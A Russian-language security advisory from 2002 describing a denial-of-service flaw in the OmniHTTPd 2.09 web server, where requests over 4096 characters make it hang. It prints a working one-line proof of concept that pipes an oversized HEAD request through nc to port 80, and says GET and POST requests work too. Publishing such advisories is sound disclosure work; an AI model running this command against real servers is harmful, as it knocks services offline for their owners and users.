DoS проитив OmniHTTPd

Дата публикации:
02.07.2002
Дата изменения:
17.10.2006
Всего просмотров:
699
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: OmniHTTPd - универсальный Web сервер для Windows 9x и NT. При попытке обработать длинный HTTP запрос (более 4096 символов), сервер перестанет отвечать на дальнейшие запросы и зависнет.

Пример:

perl -e 'print "HEAD / "."a"x4096 ."\n\n"' | nc 127.0.0.1 80

Эта атака срабатывает и с другими типами запросов – ‘get’, ‘post’ и т.п.

Уязвимость обнаружена в OmniHTTPd v2.09

Ссылки: BufferOverflow in OmniHTTPd 2.09

или введите имя

CAPTCHA